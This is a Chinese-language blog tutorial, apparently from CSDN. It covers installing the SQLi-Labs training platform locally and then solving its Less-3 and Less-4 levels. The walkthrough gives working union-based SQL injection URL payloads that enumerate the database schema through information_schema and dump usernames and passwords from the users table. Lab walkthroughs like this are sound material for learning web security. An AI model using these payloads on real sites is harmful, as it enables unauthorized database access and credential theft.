web安全sql注入篇——sqls-labs的安装和注入


前言

我们在刚学习 SQL 注入的时候,往往都需要一个能 SQL 注入的网站进行 SQL 注入学习。如果直接去网上寻找存在 SQL 注入的网站对新手来说有些难度,因此我们一般都是在本地搭建一个能 SQL 注入测试的网站。

这里就来讲解一下 SQLi-Labs 的下载,安装,搭建教程。

注意: mysql 版本一定要设置成 php5 以上,php5 以上才有 information_schema 库。

一、sqls-labs是什么?

SQLi-Labs 是一个专业的 SQL 注入练习平台,它适用于 GET 和 POST 等多场景的注入。

二、windows环境安装

使用 phpStudy 这个软件一键安装,方便快捷。
在这里插入图片描述创建好后重新启动一下小皮。

三、修改配置文件

修改 \sqli\sql-connections 目录下的 db-creds.inc 文件内容,将数据库默认的信息修改为自己数据库的信息

在这里插入图片描述主要是修改 dbpass 的内容,小皮的 Windows 版中默认为 root,所以这里直接添加root,如果使用其他环境则根据具体环境修改即可。

四、访问sqls-labs,并点击「Setup/reset Database for labs」来初始化创建数据库

在这里插入图片描述如果出现这个界面,就表名sqls-labs配置成功
在这里插入图片描述

五、注入第三关lees3

1.在URL框输入?id=1\能得到闭合符号为’)。
在这里插入图片描述

2.依次输入?id=1’) order by 7 – -
?id=1’) order by 4 – -
?id=1’) order by 3 – -
可以得到只有3列数据在这里插入图片描述
在这里插入图片描述
在这里插入图片描述3.输入?id=-1’) union select 1,2,3 – -
只显示了2,3,说明只有2和3可以当注入口。
在这里插入图片描述
4.输入?id=-1’) union select 1,database(),version() – -
爆出数据库版本为5.7.26,数据库名为security。在这里插入图片描述
5.输入?id=-1’) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’ – -
爆出了security库的四个表:emails、referers、uagents、users
在这里插入图片描述
6.根据第五步得到的信息,可以大致推测到敏感信息位于users表。接下来输入:?id=-1’) union select 1,2,group_concat(column_name) from information_schema.columns where columns.table_schema=‘security’ and columns.table_name=‘users’ – -
爆出user的三个列:id、username、password
在这里插入图片描述
7.根据第6部得到的信息,就可以知道了用户名和密码位于user表下的username和password列。
输入:?id=-1’) union select 1,group_concat(username),group_concat(password) from users – -
爆出了敏感数据
在这里插入图片描述

六、注入第四关less4

1.同理,输入:?id=1\ 使用转义符号\爆出闭合符号为")
在这里插入图片描述2.输入:?id=1") order by 3 – -
得出只有三列数据
在这里插入图片描述3.输入:?id=-1") union select 1,2,3 – -
只显示了2,3,说明只有2和3可以当注入口。
在这里插入图片描述4.输入?id=-1") union select 1,database(),version() – -
爆出数据库版本为5.7.26,数据库名为security。

在这里插入图片描述
5.输入?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’ – -
爆出了security库的四个表:emails、referers、uagents、users在这里插入图片描述
6…根据第五步得到的信息,可以大致推测到敏感信息位于users表。接下来输入:?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where columns.table_schema=‘security’ and columns.table_name=‘users’ – -
爆出user的三个列:id、username、password在这里插入图片描述
7.根据第6部得到的信息,就可以知道了用户名和密码位于user表下的username和password列。
输入:?id=-1") union select 1,group_concat(username),group_concat(password) from users – -
爆出了敏感数据在这里插入图片描述

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
? 第四章 T-SQL编程 ? ? 1、TSQL语句的分类 ? 2、TSQL语句实战1 ? 3、TSQL语句实战2 ? 4、TSQL语句实战3 ? 5、TSQL语句实战4 ? 6、TSQL语句实战5 ? 7、TSQL语句实战6 ? 8、TSQL语句实战7 ? 9、TSQL语句实战8 ? 10、TSQL语句实战9 ? 11、TSQL语句实战10 ? 12、TSQL语句实战11 ? 13、TSQL语句实战12 ? 14、TSQL语句实战13 ? 15、TSQL语句实战14 ? 16、TSQL语句实战15 ? 17、TSQL语句实战16 ? 18、TSQL语句实战17 ? 19、TSQL语句实战18 ? 20、TSQL语句实战19 ? 21、TSQL语句实战20 ? ? 第五章 函数 ? ? 1、函数简介 ? 2、函数(1) ? 3、函数(2) ? 4、函数(3) ? 5、函数(4) ? 6、函数(5) ? 7、函数(6) ? 8、函数(7) ? 9、函数(8) ? 10、函数(9) ? 11、函数(10) ? 12、函数(11) ? 13、函数(12) ? 14、函数(13) ? 15、函数(14) ? 16、函数(15) ? 17、函数(16) ? 18、函数(17) ? 19、函数(18) ? 20、函数(19) ? 21、函数(20) ? 22、函数(21) ? 23、函数(22) ? ? ? 第六章 存储过程 ? ? 1、存储过程(1) ? 2、存储过程(2) ? 3、存储过程(3) ? 4、存储过程(4) ? 5、存储过程(5) ? 6、存储过程(6) ? 7、存储过程(7) ? 8、存储过程(8) ? 9、存储过程(9) ? 10、存储过程(10) ? 11、存储过程(11) ? 12、存储过程(12) ? 13、存储过程(13) ? 14、存储过程(14) ? 15、存储过程(15) ? 16、存储过程(16) ? 17、存储过程(17) ? 18、存储过程(18) ? 19、存储过程(19) ? 20、存储过程(20) ? 21、存储过程(21) ? ? 第七章 游标 ? ? 1、游标1 ? 2、游标2 ? 3、游标3 ? 4、游标4 ? 5、游标5 ? 6、游标6 ? 7、游标7 ? 8、游标8 ? 9、游标9

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值